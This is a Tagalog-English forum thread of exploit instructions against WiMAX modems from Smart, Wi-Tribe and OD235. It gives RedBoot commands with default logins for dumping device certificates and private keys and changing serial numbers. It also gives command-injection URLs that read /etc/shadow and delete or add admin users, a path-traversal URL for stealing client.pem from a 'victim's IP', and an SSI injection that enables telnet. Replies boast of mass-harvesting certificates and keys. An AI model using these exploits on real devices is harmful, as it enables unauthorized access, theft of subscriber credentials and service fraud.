BAGSAKAN 2015 ! - cr4mfs sy

[cr4mfs sy]

====================================================
COMPLETE REDBOOT COMMAND
====================================================​

BEFORE ANYTHING ELSE, GUSTO KO SABIHIN NA HINDI KO ITO NA LEECH KANINUMAN. IPAPAKITA KO DITO ANG PROCESS KUNG PAANO KO NAKUHA ANG COMMAND NG REDBOOT. HERE'S THE PROOF.

1. GAMITIN MO ANG TOOL NG CERT-WRITER.EXE AT SNWRITER.EXE GALING SA BM622M .

2. DOWNLOAD WIRESHARK

3. NGAYON CLOSE ALL BROWSERS AT RUNNING APPLICATION PARA DI ITO MADETECT NG WIRESHARK.

4. OPEN CERT-WRITER.EXE OR SNWRITER.EXE. THEN OPEN WIRESHARK.

5. CHOOSE INTERFACE SA WIRESHARK PILIIN ANG LAN INTERFACE THEN CLICK START. OPEN CERT-WRITER.EXE THEN CLICK CONNECT
THEN MAG UPLOAD KA NG CERTIFICATE AT PRIVATE KEY. ITO AY PARA MAKITA SA WIRESHARK KUNG PAANO MAG WRITE NG PEMKEY.

6. AFTER MAIUPLOAD ANG PEM AT KEY CLICK VERIFY PARA MA DUMP MO NAMAN ANG PEM AT KEY AT MAKITA SA WIRESHARK.

7. PUNTA KA SA WIRESHARK HANAPIN MO DOON YUNG 192.168.15.1
IMAGE:
View attachment 219835

8. RIGHT CLICK MO ANG 192.168.15.1 THEN CHOOSE "FOLLOW TCP STREAM" MAKIKITA MO NA NAIRECORD NYA ANG MGA COMMAND AT OUTPUT NG REDBOOT.PWEDE MO RIN SYA ISAVE.

IMAGE:
View attachment 219838


"PARA PO SA KAALAMAN NG NAKARARAMI MAGKAIBA PO ANG FORMAT NG PAGHUGOT NG PEM AT KEY NG WI-TRIBE AT SMART."

SMART DUMP PEM AT KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot>rfcal -act 48 -arg1 0 -arg2 4096
RedBoot>rfcal -act 49 -arg1 0
4084 
RedBoot>read cert_file 4084 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot>rfcal -act 48 -arg1 1 -arg2 1712
RedBoot>rfcal -act 49 -arg1 1 
1712 
RedBoot>read cert_file 1712 0
-----BEGIN RSA PRIVATE----- 
-----END RSA PRIVATE KEY-----

WI-TRIBE DUMP PEM AT KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot> 
rfcal -act 48 -arg1 0 -arg2 1184
RedBoot> 
rfcal -act 49 -arg1 0 
1183 
RedBoot> 
read cert_file 1183 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot> 
rfcal -act 48 -arg1 1 -arg2 896

RedBoot> 
rfcal -act 49 -arg1 1 
896 
RedBoot> 
read cert_file 896 0
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

CHANGE SERIAL NUMBER

RedBoot> rfcal -act 25
RedBoot> read serialno 128 0
DVTKC133200799
RedBoot>write serialno 128 0
g 1212211123456gtk

ANG LAHAT NG ITO AY MAY BASEHAN, NORMALLY MAKAKAPAG REDBOOT KA SA PORT 9000 LANG. ITO AY MAGAGAWA LAMANG SA LAN CONNECTION. WELL KNOWN NA SA ATIN YAN MATAGAL NA.

EXAMPLE: 
telnet 192.168.15.1 9000

redboot>

ANG PAG REDBOOT NAMAN SA LOOB NG TELNET NA NAGAGAWA SA WAN AT LAN AY MAY BASEHAN AKO KUNG PAANO KO NAKUHA AT DI KO ITO NA LEECH KANINUMAN.

ANG LOGIC AY MATATAGPUAN SA LOOB NG /init.d/boot_update File Directory.

View attachment 219839

================================================
OD235 / OD35 BACK DOOR COMMAND AND TRICK
================================================​

[COLOR="#0000FF"]BROWSER BACK DOOR OD235
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAYS SUCCESFULLY[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+[COLOR="#008000"]cat+/etc/shadow[/COLOR]

[COLOR="#0000FF"]OPEN NEW TAB
PASTE THIS COMMAND LINK.DOON LALABAS ANG RESULT[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

PAPALITAN MO ANG /etc/shadow depende sa nais mo makita.

CHANGE ADMIN LOGIN SA OD235 ONLY !! USER LOGIN ONLY / BLANK PASSWORD

[COLOR="#0000FF"]OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAYS SUCCESFULLY[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+deluser Superuser 

[COLOR="#0000FF"]OPEN NEW TAB
PASTE THIS COMMAND LINK.DOON LALABAS ANG RESULT[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

[COLOR="#0000FF"]CHANGE ADMIN LOGIN SA OD235 ONLY !![/COLOR]
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAYS SUCCESFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+adduser CRAMFS

[COLOR="#0000FF"]OPEN NEW TAB
PASTE THIS COMMAND LINK.DOON LALABAS ANG RESULT[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

DIRECTORY LIST

/etc/passwd
/etc/shadow
/mnt/jffs2/conf/user/supplicant.conf
/mnt/jffs2/conf/user/ltesetting.conf
/mnt/jffs2/conf/user/ui.conf
/mnt/jffs2/conf/iser/wmxsetting.conf
/mnt/jffs2/conf/user/sysini.conf

HIDDEN COMMANDS

cmscfg --help
-s SET
-g GET
-r REPLACE
-v VALUE
-n PARAM

SAMPLE COMMAND:

telnetd enable

cmscfg -s -n sys_telnetd -v enable

ftpd enable

cmscfg -s -n sys_ftpd -v enable

TFTP COMMAND

must have tftpd32.exe, set-up your ip to 192.168.15.2 and tftpboot directory

~#cd /mnt/jffs2/conf/user/
~#tftp -g -r /mnt/jffs2/conf/user/sysini.conf 192.168.15.2 sysini.conf---> get file

~#cd /mnt/jffs2/etc/
~#tftp -p -r shadow 192.168.15.2 shadow ---> put file

OPEN TELNET FOR BOTH WITRIBE LIBERTY AND OD235 or OD350

the command is;

fw_setenv factory 1   ----> to enable telnet , but disabled http

fw_setenv factory 0   -----> to enable http , but disabled telnet

DISCLAIMER:
WALA AKONG PANANAGUTAN KUNG ANO MAN ANG MANGYARI SA INYONG DEVICE. STRICTLY FOR EDUCATIONAL PURPOSES ONLY.
WALA NA PO AKONG PANANAGUTAN KUNG ITO PO AY GAMITIN SA ILLEGAL . USE IT AT YOUR OWN RISK
​

ENJOY

CR4MFS SY




[/B]

 

[grief]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

nagbalik na pala ang tunay na master maraming salamat sir

 

[jessie_19]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

salamat sa share,,kaso ayaw naman gumana yung password..bat po kaya..

 

[gunzklar]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

LIBERTY WIXB-175x204 PEMKEY GRABBING​

STEP # 1

On Mozilla Browser Oepn Victims IP. LOGIN using this possible credentials

witribe
witribe123
witribe12345

STEP # 2

Press CTRL + SHIFT key. Click Debugger Tab. At the left side makikita mo ang sysconf.cgi. Itapat mo ang CURSOR mo sa sysconf.cgi upang makita mo ang URL
at Lumabas ang SID. Pagdating sa timestamp kahit default timestamp lang na lalabas sa Address bar mo.

View attachment 1040555

STEP # 3

Open NEW TAB > Copy and Paste this Exploit. ilagay ang nararapat na ip address at SID at TIMESTAMP.
then press ENTER lalabas na ang mahiwagang PEMKEY.

SAMPLE EXPLOIT:


EXPLOIT:
https://ip address:8080/cgi-bin/sysconf.cgi?page=../../tmp/var/client.pem&action=request&sid=ilagay dito ang sid×tamp=ilagay dito ang timestamp

View attachment 1040557


OPTIONAL:
SA MGA MARUNONG GUMAMIT NG TAMPER DATA MAS MADALI DITO.

1. LOGIN TO VICTIMS GUI.

2. Go to Personalize Tab > Device Name .. ilagay sa New Device Name FOO. Huwag muna iclick ang APPLY.

3. Open Tamper Data then Click START then Click mo na ang APPLY.

4. Uncheck mo yung Continioue Tampering. Then Click Tamper.

5. Then Click OK

View attachment 1040562


6. hanapin mo ang GET right Click mo yun Choose Replay Browser

View attachment 1040560

7. Dapat ganito lalabas after mo piliin ang Replay Browser. may makikita ka doon na Personalize_password. Papalitan mo yun ng ../../tmp/var/client.pem Then Click Okay. then magoopen syang ng New Tab at lalabs doon ang Pemkey.

View attachment 1040565

=======================================================================
BACKDOOR COMMANDS
=======================================================================​

Tamper Data Method:

1. Gayahin lang ang Method ng Tamper Data via Device Name.

2. Change name to FOO

3. Start Tamper Data. Change FOO to <!--#exec cmd="cmscfg -s -n sys_telnetd -v enable"-->

4. Click OK.

5. Again hanapin ang GET > right Click Then Choose Replay Browser.lalabas doon ay Personalize_password palitan mo ng ../../etc/hosts Then click OK

6 .TELNET IS NOW ENABLE


DISCLAIMER:
For Educational Purposes Only. I am not liable in any illegal acts may cause by using this.
Thank you


GM/cr4mfs_sy

yun oh

salamat tito makoy ikaw na talaga hahahaha

 

[Jekz03]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Lumabas din ^^ Thanks Master !

 

[wimax1019]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

hahaha bumawi ka ahh

 

[skylit_drive27sep]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

nice one!!! hahaha..

 

[S3cured]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Eto ang mapapakinabangan ko !!
madami pang magagawa dito.

 

[taptaprevenge]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Aray Sabog nanaman
Sunod sunod na pasabog ahh ano kaya susunod

 

[aklanon]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

salamat dito master....!!ng mapag aralan po muna

 

[gunzklar]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

marrape nanaman si tribo neto

malamang sa malamang magiging 1 is to 1 na talaga to hehe, daming masscan e ikaw nalang mag sasawa

wag nyo lang sirain yung nabubuksan nyo hehe, sinabi din kase yung backdoor para sa telnet

idol talaga

 

[S3cured]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Mukhang sunod sunod na ang pasabog ah !!
Dami ko na nakuhang cert at key. salamat T.S.

 

[wimax1019]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

pasabugin na din ang pag ayos kahit closed all ports hahaha

 

[bossingdummy]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Salamat ts dami ko na din ng cert and key

Kaso mali yata format ko

Save as all files

Tapos

2010xxxxxx pem.pem > cert
2010xxxxxx pem.key > key

Pag upload invalid daw panu po ba tamang formAt nyan ts

Correct me if im wrong?

 

[tankz]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

all up......todo pung....bisaklat ! thanks master galaxyman .

 

[vincevenice17]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

master ??..iisa lang sa lahat c Nathalia,XEla..haha..ORIGINAL!

 

[G3mt3k]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

si alex lang ang master di si cramfs karamihan sa alam ni cramfs ni leech nia lang sa mga tropa nia pati yung pinagmamalaki niang redboot. ang totoo nian bago pa malaman ni cramfs yung pem key dump sa tribu alam na ni natalia matagal na. in short niligawan ni cramfs ang command pero mautak si alex aka natalia gazanova kaya ang binigay eh dump na minsan sablay na agad namang pinagmalaki ni scammer king at pinagkaperahan. malalalim ang kwento kung bakit badtrip sa kanya si alex. kaya para sakin leecher din yang si cramfs..wag mo lokohin sarili mo cramfs alam mong totoo sinasabi ko hahahahaha baka sabihin mo na naman ingit kami sayo??? wala ako dapat kaigitan sayo

 

[tiger1925]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

hello mr sy, thnx sa share wag mo nalang pansinin mga mag bash sayo. may kasabihan nga na "You can't please everyone" kaya focus ka nalang sa mga humahanga sayo . Thnx sa pag share ulit, ang masasabi ko lang ay marami ako natutunan sa mga shinare mo at lahat 100% working

View attachment 219793

 

[kcmeill]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

salamat ...keep on sharing

 

[grief]

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

bakit ganon nag aaway aaway na naman kayo na delete tuloy yung isang thread useful din naman yun tska ok din naman yung tut bakit kaya na delete yun